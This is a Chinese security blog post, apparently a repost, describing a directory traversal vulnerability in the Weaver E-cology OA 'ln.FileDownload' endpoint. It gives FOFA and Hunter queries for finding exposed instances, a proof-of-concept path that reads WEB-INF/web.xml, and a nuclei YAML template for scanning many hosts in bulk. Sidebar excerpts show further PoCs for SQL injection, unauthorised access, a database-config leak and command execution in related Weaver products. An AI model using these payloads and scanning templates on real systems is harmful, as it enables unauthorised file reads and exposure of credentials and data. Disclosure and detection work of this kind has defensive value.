首页 > 其他分享 >泛微E-cology filedownload目录遍历漏洞

泛微E-cology filedownload目录遍历漏洞

时间:2023-09-04 15:45:00浏览次数:47  
标签:ecology filedownload OA 漏洞 cology 泛微

漏洞描述

泛微E-cology filedownload文件存在目录遍历漏洞

漏洞复现

fofa查询语法:app="泛微-协同办公OA"
鹰图查询语法:app.name="泛微 e-cology 9.0 OA"
登录页面如下:

POC:/weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml

nuclei批量yaml文件

id: ecology-filedownload-directory-traversal

info:
  name: Ecology - Local File Inclusion
  author: princechaddha
  severity: high
  description: Ecology is vulnerable to local file inclusion.
  metadata:
    max-request: 1
    fofa-query: app="泛微-协同办公OA"
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: ecology,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "<url-pattern>/weaver/"
        part: body

标签:ecology,filedownload,OA,漏洞,cology,泛微
From: https://www.cnblogs.com/pursue-security/p/17677229.html

相关文章

  • 泛微E-cology FileDownloadForOutDoc SQL注入漏洞(CVE-2023-15672)
    漏洞简介泛微e-cology未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限等。影响版本Ecology9.x补丁版本<10.58.0;Ecology8.x补丁版本<10.58.0漏洞复现fo......
  • 泛微E-cology ifNewsCheckOutByCurrentUser.dwr SQL注入漏洞
    漏洞描述泛微E-cology的ifNewsCheckOutByCurrentUser.dwr文件存在SQL注入漏洞。漏洞复现fofa语法:app="泛微-协同办公OA"登录页面如下:POC:POST/dwr/call/plaincall/CptDwrUtil.ifNewsCheckOutByCurrentUser.dwrHTTP/1.1Host:User-Agent:Mozilla/5.0(WindowsNT5.1)A......
  • 泛微E-Office UserSelect未授权访问漏洞
    漏洞描述泛微OAE-OfficeUserSelect接口存在未授权访问漏洞,通过漏洞攻击者可以获取敏感信息漏洞复现fofa语法:app="泛微-EOffice"登录页面如下:POC:/UserSelect/nuclei批量yaml文件id:EOffice_UserSelect_unauthinfo:name:泛微OAE-OfficeUserSelect未授权访问漏洞......
  • 泛微E-Office mysql_config.ini 数据库信息泄漏漏洞
    漏洞描述泛微E-Officemysql_config.ini文件可直接访问,泄漏数据库账号密码等信息漏洞复现fofa语法:app="泛微-EOffice"登录页面如下:验证POC:/mysql_config.ininuclei批量yaml文件id:EOffice_mysql_config_information_leakinfo:name:泛微OAE-Officemysql_config.i......
  • 泛微E-Mobile 6.0 命令执行漏洞
    漏洞描述泛微E-Mobile6.0存在命令执行漏洞(注:影响版本不确定,如下图6.6版本的也成功了)版本信息:E-Mobile6.0漏洞复现fofa语法:fofa:app="泛微-EMobile"hunter:app.name="泛微e-mobileOA"登录页面如下:POC:POST/client.doHTTP/1.1Host:Content-Type:multipart/form-dat......
  • 泛微OA清理人员抄送待办
    创建查询,链接ecology数据库,解决人员ID为6的抄送数据--1。备份wf_curr0724bak自定义select*intowf_curr0724bakfromworkflow_currentoperator--2查询替换useridselect*fromworkflow_currentoperatorawhereisremarkin(8,9)andisremarkin(8,9)andisL......
  • 泛微ecology FileDownloadForOutDoc-前台sql注入
    厂商发布漏洞补丁Ecology_security_20230707_v9.0_v10.58.0.ziphttps://www.weaver.com.cn/cs/package/Ecology_security_20230707_v9.0_v10.58.0.zip?v=2023070700分析补丁文件ecology\WEB-INF\myclasses\weaver\security\rules\ruleImp\SecurityRuleForOutDocForSql.class......
  • 泛微OA节点后附加操作-update数据
    1.礼品领用申请流程,到人力资源部备案节点,由人力资源部填写“实际使用数量”,在该节点后减少对应礼品的库存数量。2.节点后附加操作2.1新建DML接口动作2.2填写信息3.DML语句updateuf_jczlsetkcsl=kcsl-'{?d.sjsl}'whereid='{?d.lpmc}'......
  • 泛微10.58
    POST/weaver/weaver.file.FileDownloadForOutDocHTTP/1.1Host:xxxxxContent-Length:49Accept-Language:zh-CN,zh;q=0.8Accept:/User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64;rv:99.0)Gecko/20100101Firefox/99.0Accept-Charset:GBK,utf-8;q=0.7,*;q......
  • What are the differences between in vivo and in vitro testing of drugs for toxic
    Intoxicologystudies,therearetwomaintypesoftestsusedtoassessthesafetyandpotentialtoxiceffectsofdrugs:invivotestsandinvitrotests.Weknowthatthetraditionalmethodofdrugtoxicologyresearchistouseanimalmodelsforinvivo......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99